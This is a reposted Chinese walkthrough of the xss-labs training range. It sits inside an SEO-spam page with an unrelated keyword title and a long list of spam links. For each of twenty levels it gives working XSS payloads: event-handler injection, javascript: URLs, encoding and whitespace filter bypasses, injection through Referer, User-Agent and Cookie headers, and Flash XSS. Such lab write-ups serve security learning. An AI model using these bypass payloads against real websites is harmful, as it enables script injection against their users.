当前位置: 首页 > news >正文

网站制作带优化搜索引擎优化解释

网站制作带优化,搜索引擎优化解释,怎么做php网站,wordpress标题代码调用每一关的方法不唯一;可以结合源码进行分析后构造payload; 通关技巧(四步): 1.输入内容看源码变化; 2.找到内容插入点; 3.测试是否有过滤; 4.构造payload绕过 第一关 构造paylo…

每一关的方法不唯一;可以结合源码进行分析后构造payload;

通关技巧(四步):

1.输入内容看源码变化;

2.找到内容插入点;

3.测试是否有过滤;

4.构造payload绕过

第一关

构造payload:name=<script>alert()</script>

第二关

构造payload:" οnclick=alert() "

第三关

构造payload:' οnclick=alert() '

第四关

构造payload:" οnclick=alert() "

第五关

构造payload:"><a href="javascript:alert()">123</a>//

第六关

构造payload:" Onclick=alert() "

第七关

构造payload:" oonnclick=alert() "

第八关

在url中构造payload:javascr%09ipt:alert()

也可以用html实体编码替换script中的一个字符来绕过(方法很多,不演示)

第九关

构造payload:javascri&#112;t:alert('http://')

第十关

构造payload:t_sort=" οnclick=alert() type="

第十一关

通过bp抓包修改referer:" οnclick=alert() type="

第十二关

通过bp抓包修改User-Agent: " οnclick=alert() type="

第十三关

通过bp抓包修改Cookie: user=" οnclick=alert() type="

第十四关(坏了,直接略过)

iframe标签:规定一个内联框架用于显示外部引入网站的信息;引入网站内容会被嵌套进当前页面

通过查看源码发现利用了iframe标签;源码中没有任何注入点;那么注入点只能是引入的网站中;可以网站打不开;看了大佬的wp发现是向引入的网站上传一张带有xss恶意代码的图片;通过加载是的图片嵌入到本地触发弹窗(exchangeable image file format)exif xss

大佬的wp:xss-labs靶场-第十四关

第十五关

构造payload:src="level1.php?name=</h2><h2 οnclick=alert()>123"

第十六关

构造payload:keyword=<input%0Aοnclick=alert()>

对空格进行实体编码了,需要空格绕过

第十七关(看了大佬的wp)

查看源码发现对输入信息进行了预定义字符转换;但是输出的语句中有漏洞点

构造payload:arg01=a&arg02=%20οnmοuseοver=alert(123)%20type=text%20

然后鼠标移到不支持此插件的图片上方就通过了(edge可以显示此图片;火狐图片也没法加载)

第十八关

源码中验证和输出和第十七关一样

直接构造payload:arg01=a&arg02=%20οnmοuseοver=alert(123)%20type=text%20

第十九关

这关就不能投机取巧了;真的考察flash的xss漏洞了;由于浏览器不支持flash;看不到提示的关键信息;所以就略过了;现在flash基本遇不到了,就不深究了

payload:?arg01=version&arg02=<a href="javascript:alert()">here</a>

推荐大佬的wp:XSS-labs Level 19 Flash XSS_xsf03.swf-CSDN博客

第二十关

同上

payload:?arg01=id&arg02=xss\"))}catch(e){alert(1)}//%26width=123%26height=123

推荐大佬的wp:XSS-labs Level 20 Flash XSS_xss-labs level20-CSDN博客

10

http://www.zhongyajixie.com/news/61014.html

相关文章:

  • 汕头微网站域名查询服务器
  • 济南城乡建设委员会官方网站小说排行榜2020前十名
  • 空壳网站主体注销优化营商环境的金句
  • 爱站网关键词挖掘工具站长工具佛山网站建设制作
  • bp链接生成器网站微信公众号平台官网
  • 网站建设管理招聘百度95099如何转人工
  • 为什么政府网站做的很烂上海百度seo优化
  • 石家庄企业做网站百度竞价推广的技巧
  • 做钓鱼网站论坛小红书怎么推广引流
  • 手机上的免费销售网站建设天气预报最新天气预报
  • 开封景区网站建设方案厦门seo哪家强
  • 网站建设与管理 试卷如何快速网络推广
  • 网站建设技能考试试题专业北京seo公司
  • 宝安多屏网站建设公司好吗查询网官网
  • 网站登陆验证怎么用java做游戏代理怎么找渠道
  • 做的网站缩小内容就全乱了推广app赚佣金接单平台
  • 湖南长沙招聘信息最新招聘2022百度 seo 工具
  • 局域网里做网站网络营销管理
  • 门户网站建设工序产品推广ppt
  • 上海网站建设市场分析谷歌seo培训
  • 建设 静态网站广告推广计划
  • 日本做h视频在线观看网站今日头条新闻下载安装
  • 自己做烘焙的网站东莞百度推广排名优化
  • 网络整合营销案例太原seo网络优化招聘网
  • 重庆梁平网站建设公司电脑系统优化软件十大排名
  • 外国类似黄色网站苏州关键词排名提升
  • app与网站的区别是什么站长资讯
  • 做网站在市场营销策划ppt
  • 4网站建设哪里好点网站维护工作内容
  • 怎么做新网站淘宝流量平台